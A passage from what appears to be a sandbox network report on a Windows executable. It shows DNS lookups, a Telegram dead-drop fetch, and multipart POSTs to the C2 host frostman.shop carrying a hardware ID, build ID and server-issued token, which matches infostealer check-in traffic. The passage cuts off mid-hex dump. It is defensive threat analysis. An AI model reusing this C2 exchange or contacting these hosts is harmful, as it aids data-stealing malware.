                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:28.343924046 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:28.344594955 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:28.352780104 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:28.667841911 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:28.672722101 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:28.672755003 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:28.672789097 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:28.673024893 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:28.680094004 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.122565031 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.125310898 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.125384092 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.125437975 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.125581026 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.133801937 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.481348991 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.486789942 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.486849070 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.486881971 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.487116098 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.494287014 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.809113979 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.814203024 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.814337969 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.814353943 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.814374924 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.814627886 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:29.852922916 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:30.153522015 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:41.205343008 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:41.205487967 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:41.205674887 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:41.205764055 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.219634056 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.219702005 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.220403910 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.220469952 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.292221069 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.294380903 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.294459105 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.318283081 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.359621048 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.359705925 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.533792973 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.533824921 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.533854008 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.533950090 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.534121037 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.534148932 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.534174919 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.534216881 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.534249067 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.551103115 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.608457088 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.643660069 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.674199104 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.674688101 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.674854994 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:42.675533056 CET58461443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.062851906 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.062870979 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.062881947 CET44358461162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:43.095268965 CET58461443192.168.2.7162.159.61.3

                                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:04.953186989 CET192.168.2.71.1.1.10xcd48Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:07.092207909 CET192.168.2.71.1.1.10x15b1Standard query (0)frostman.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.548209906 CET192.168.2.71.1.1.10xc30bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.548209906 CET192.168.2.71.1.1.10x78c3Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.007153988 CET192.168.2.71.1.1.10xd23Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.008732080 CET192.168.2.71.1.1.10xa839Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:39.387473106 CET192.168.2.71.1.1.10x3d99Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:39.387639046 CET192.168.2.71.1.1.10xe292Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:40.526773930 CET192.168.2.71.1.1.10x42c3Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:40.526968002 CET192.168.2.71.1.1.10x36bStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.578581095 CET192.168.2.71.1.1.10x8dc4Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.578893900 CET192.168.2.71.1.1.10xba06Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.579328060 CET192.168.2.71.1.1.10x9b5Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.581454992 CET192.168.2.71.1.1.10x922eStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.598177910 CET192.168.2.71.1.1.10xb6afStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.598669052 CET192.168.2.71.1.1.10x6150Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.085418940 CET192.168.2.71.1.1.10x1f85Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.086007118 CET192.168.2.71.1.1.10xb0ceStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.098591089 CET192.168.2.71.1.1.10xd6b3Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.098812103 CET192.168.2.71.1.1.10xd303Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.225064039 CET192.168.2.71.1.1.10xe975Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.225173950 CET192.168.2.71.1.1.10xc077Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.365053892 CET192.168.2.71.1.1.10xfb5aStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.365189075 CET192.168.2.71.1.1.10x62d6Standard query (0)api.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:05.090451002 CET1.1.1.1192.168.2.70xcd48No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:07.230459929 CET1.1.1.1192.168.2.70x15b1No error (0)frostman.shop116.203.12.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.685060978 CET1.1.1.1192.168.2.70xc30bNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:22.685448885 CET1.1.1.1192.168.2.70x78c3No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.143198013 CET1.1.1.1192.168.2.70x4c85No error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.144129992 CET1.1.1.1192.168.2.70xd23No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.185723066 CET1.1.1.1192.168.2.70xa839No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.304406881 CET1.1.1.1192.168.2.70xf4d4No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.304406881 CET1.1.1.1192.168.2.70xf4d4No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:37.305577993 CET1.1.1.1192.168.2.70x681No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:39.525255919 CET1.1.1.1192.168.2.70xe292No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:39.525330067 CET1.1.1.1192.168.2.70x3d99No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:40.663450003 CET1.1.1.1192.168.2.70x42c3No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:40.663450003 CET1.1.1.1192.168.2.70x42c3No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:40.665424109 CET1.1.1.1192.168.2.70x36bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.716483116 CET1.1.1.1192.168.2.70x8dc4No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.716483116 CET1.1.1.1192.168.2.70x8dc4No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.716944933 CET1.1.1.1192.168.2.70xba06No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.717571020 CET1.1.1.1192.168.2.70x9b5No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.717571020 CET1.1.1.1192.168.2.70x9b5No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.719456911 CET1.1.1.1192.168.2.70x922eNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.735302925 CET1.1.1.1192.168.2.70xb6afNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.735302925 CET1.1.1.1192.168.2.70xb6afNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:41.735332966 CET1.1.1.1192.168.2.70x6150No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.222197056 CET1.1.1.1192.168.2.70x1f85No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.222197056 CET1.1.1.1192.168.2.70x1f85No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.222197056 CET1.1.1.1192.168.2.70x1f85No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.222197056 CET1.1.1.1192.168.2.70x1f85No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.236222982 CET1.1.1.1192.168.2.70xd6b3No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.236434937 CET1.1.1.1192.168.2.70xd303No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.361879110 CET1.1.1.1192.168.2.70xe975No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.362695932 CET1.1.1.1192.168.2.70xc077No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.502271891 CET1.1.1.1192.168.2.70x62d6No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:42.502526999 CET1.1.1.1192.168.2.70xfb5aNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.155817032 CET1.1.1.1192.168.2.70xbcd8No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:45.155817032 CET1.1.1.1192.168.2.70xbcd8No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                              • t.me
                                                                                                                                                                                                                                                                              • frostman.shop
                                                                                                                                                                                                                                                                              • www.google.com
                                                                                                                                                                                                                                                                              • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                              • https:
                                                                                                                                                                                                                                                                                • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                • c.msn.com

                                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              0192.168.2.749699149.154.167.994436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:06 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                              Host: t.me
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:07 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:06 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                              Content-Length: 12305
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Set-Cookie: stel_ssid=9b20bd88ed4704c2a8_11979302175647296603; expires=Sat, 21 Dec 2024 06:31:06 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                              Cache-control: no-store
                                                                                                                                                                                                                                                                              X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                              2024-12-20 06:31:07 UTC12305INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              1192.168.2.749700116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:09 UTC233OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:09 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              2192.168.2.749701116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:11 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----4OHD2VS26F3EUA1V3790
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 256
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:11 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 34 4f 48 44 32 56 53 32 36 46 33 45 55 41 31 56 33 37 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 46 43 35 38 33 37 35 41 30 43 33 38 38 36 35 38 32 35 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 34 4f 48 44 32 56 53 32 36 46 33 45 55 41 31 56 33 37 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 34 4f 48 44 32 56 53 32 36 46 33 45 55 41 31 56 33 37 39 30 2d 2d 0d
                                                                                                                                                                                                                                                                              Data Ascii: ------4OHD2VS26F3EUA1V3790Content-Disposition: form-data; name="hwid"2EFC58375A0C3886582548-a33c7340-61ca------4OHD2VS26F3EUA1V3790Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------4OHD2VS26F3EUA1V3790--
                                                                                                                                                                                                                                                                              2024-12-20 06:31:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:11 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:12 UTC70INData Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 31 7c 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 7c 31 7c 31 7c 31 7c 30 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 3b1|1|1|1|4971dbaed128343936d3c1f60719f3d9|1|1|1|0|0|100000|10


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              3192.168.2.749703116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:13 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----UKX47GDB1DJEUA1NYM79
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 47 44 42 31 44 4a 45 55 41 31 4e 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 47 44 42 31 44 4a 45 55 41 31 4e 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 47 44 42 31 44 4a 45 55 41 31 4e 59 4d 37 39 0d 0a 43 6f 6e 74
